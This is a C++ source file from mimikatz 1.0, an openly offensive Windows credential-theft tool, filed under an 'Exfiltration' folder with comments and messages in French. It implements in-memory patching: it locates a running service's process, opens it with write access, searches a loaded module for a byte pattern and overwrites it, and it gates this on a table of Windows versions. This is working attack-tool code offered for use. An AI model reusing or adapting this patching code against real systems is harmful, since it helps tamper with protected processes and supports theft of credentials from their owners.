Exfiltration/mimikatz-1.0/modules/mod_patch.cpp


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146

/*	Benjamin DELPY `gentilkiwi`
	http://blog.gentilkiwi.com
	benjamin@gentilkiwi.com
	Licence : http://creativecommons.org/licenses/by/3.0/fr/
*/
#include "mod_patch.h"
#include "..\mimikatz\global.h"

bool mod_patch::patchModuleOfService(wstring serviceName, wstring moduleName, BYTE * patternToSearch, SIZE_T szPatternToSearch, BYTE * patternToPlace, SIZE_T szPatternToPlace, long offsetForPlace)
{
	bool reussite = false;

	mod_service::KIWI_SERVICE_STATUS_PROCESS monService;
	if(mod_service::getUniqueForName(&monService, &serviceName))
	{
		if(monService.ServiceStatusProcess.dwCurrentState != SERVICE_STOPPED && monService.ServiceStatusProcess.dwCurrentState != SERVICE_STOP_PENDING)
		{
			(*outputStream) << L"Service : " << monService.serviceDisplayName << endl;
			reussite = patchModuleOfPID(monService.ServiceStatusProcess.dwProcessId, moduleName, patternToSearch, szPatternToSearch, patternToPlace, szPatternToPlace, offsetForPlace);
		}
		else (*outputStream) << L"Le service : " << serviceName << L" (" << monService.serviceDisplayName << L") ; n\'a pas l\'air très actif" << endl;
	}
	else (*outputStream) << L"Impossible de trouver le service : " << serviceName << L" ; " << mod_system::getWinError() << endl;

	return reussite;
}

bool mod_patch::patchModuleOfPID(DWORD pid, wstring moduleName, BYTE * patternToSearch, SIZE_T szPatternToSearch, BYTE * patternToPlace, SIZE_T szPatternToPlace, long offsetForPlace)
{
	bool reussite = false;

	mod_process::KIWI_MODULEENTRY32 monModule;
	if(mod_process::getUniqueModuleForName(&monModule, (moduleName.empty() ? NULL : &moduleName), &pid))
	{
		BYTE * baseAddr = monModule.modBaseAddr;
		DWORD taille = monModule.modBaseSize;

		if(HANDLE processHandle = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, pid))
		{
			(*outputStream) << L"Recherche des patterns dans : " << moduleName << L"@pid(" << pid << L")" << endl;

			BYTE * addrPattern = NULL;
			if(mod_memory::searchMemory(baseAddr, baseAddr + taille, patternToSearch, &addrPattern, szPatternToSearch, true, processHandle))
			{
				reussite = mod_memory::writeMemory(addrPattern + offsetForPlace, patternToPlace, szPatternToPlace, processHandle);
				(*outputStream) << L"Patch " << moduleName << L"@pid(" << pid << L") : " << (reussite ? L"OK" : L"KO") << endl;
			}
			else (*outputStream) << L"mod_memory::searchMemory " << mod_system::getWinError() << endl;

			CloseHandle(processHandle);
		}
		else (*outputStream) << L"OpenProcess : " << mod_system::getWinError() << endl;
	}
	else (*outputStream) << L"mod_process::getUniqueModuleForName : " << mod_system::getWinError() << endl;
	return reussite;
}

bool mod_patch::getFullVersion(DWORD * majorVersion, DWORD * minorVersion, DWORD * build, bool * isServer, bool * is64)
{
	bool reussite = false;

	OSVERSIONINFOEX maVersion;
	if(reussite = mod_system::getVersion(&maVersion))
	{
		if(majorVersion) *majorVersion = maVersion.dwMajorVersion;
		if(majorVersion) *minorVersion = maVersion.dwMinorVersion;
		if(build) *build = maVersion.dwBuildNumber;
		if(isServer) *isServer = maVersion.wProductType != VER_NT_WORKSTATION;
		
		if(is64)
		{
			SYSTEM_INFO mesInfos;
			GetNativeSystemInfo(&mesInfos);

			*is64 = (mesInfos.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64);
		}
	}

	return reussite;
}

bool mod_patch::checkVersion(KIWI_OS_CHECK * monOsValide)
{
	bool reussite = false;
	
	DWORD majorVersion, minorVersion, build;
	bool isServer, is64;

	if(getFullVersion(&majorVersion, &minorVersion, &build, &isServer, &is64))
	{
			reussite = 
				(monOsValide->majorVersion == majorVersion) &&
				(monOsValide->minorVersion == minorVersion) &&
				((monOsValide->build == build) || (monOsValide->build == 0)) &&
				(monOsValide->isServer == isServer) &&
				(monOsValide->is64 == is64)
				;
	}
	else (*outputStream) << L"mod_patch::getFullVersion : " << mod_system::getWinError() << endl;
	return reussite;
}

bool mod_patch::checkVersion(OS monOsValide)
{	
	KIWI_OS_CHECK kOs;
	switch(monOsValide)
	{
		case WINDOWS_2000_PRO_x86: kOs.majorVersion = 5;	kOs.minorVersion = 0;	kOs.build = 0;	kOs.isServer = false;	kOs.is64 = false;	break;
		case WINDOWS_2000_SRV_x86: kOs.majorVersion = 5;	kOs.minorVersion = 0;	kOs.build = 0;	kOs.isServer = true;	kOs.is64 = false;	break;

		case WINDOWS_XP_PRO___x86: kOs.majorVersion = 5;	kOs.minorVersion = 1;	kOs.build = 0;	kOs.isServer = false;	kOs.is64 = false;	break;
		case WINDOWS_XP_PRO___x64: kOs.majorVersion = 5;	kOs.minorVersion = 2;	kOs.build = 0;	kOs.isServer = false;	kOs.is64 = true;	break;
		
		case WINDOWS_2003_____x86: kOs.majorVersion = 5;	kOs.minorVersion = 2;	kOs.build = 0;	kOs.isServer = true;	kOs.is64 = false;	break;
		case WINDOWS_2003_____x64: kOs.majorVersion = 5;	kOs.minorVersion = 2;	kOs.build = 0;	kOs.isServer = true;	kOs.is64 = true;	break;
		
		case WINDOWS_VISTA____x86: kOs.majorVersion = 6;	kOs.minorVersion = 0;	kOs.build = 0;	kOs.isServer = false;	kOs.is64 = false;	break;
		case WINDOWS_VISTA____x64: kOs.majorVersion = 6;	kOs.minorVersion = 0;	kOs.build = 0;	kOs.isServer = false;	kOs.is64 = true;	break;
		
		case WINDOWS_2008_____x86: kOs.majorVersion = 6;	kOs.minorVersion = 0;	kOs.build = 0;	kOs.isServer = true;	kOs.is64 = false;	break;
		case WINDOWS_2008_____x64: kOs.majorVersion = 6;	kOs.minorVersion = 0;	kOs.build = 0;	kOs.isServer = true;	kOs.is64 = true;	break;

		case WINDOWS_SEVEN____x86: kOs.majorVersion = 6;	kOs.minorVersion = 1;	kOs.build = 0;	kOs.isServer = false;	kOs.is64 = false;	break;
		case WINDOWS_SEVEN____x64: kOs.majorVersion = 6;	kOs.minorVersion = 1;	kOs.build = 0;	kOs.isServer = false;	kOs.is64 = true;	break;
		
		case WINDOWS_2008r2___x64: kOs.majorVersion = 6;	kOs.minorVersion = 1;	kOs.build = 0;	kOs.isServer = true;	kOs.is64 = true;	break;
	}

	return checkVersion(&kOs);
}


bool mod_patch::checkVersion(vector<OS> * vectorValid)
{
	bool reussite = false;
	
	for(vector<OS>::iterator monOs = vectorValid->begin(); monOs != vectorValid->end() && !reussite; monOs++)
	{
		reussite = checkVersion(*monOs);
	}	
	
	if(!reussite)
		(*outputStream) << L"La version du système d\'exploitation actuelle n\'est pas supportée par cette fonction." << endl;

	return reussite;
}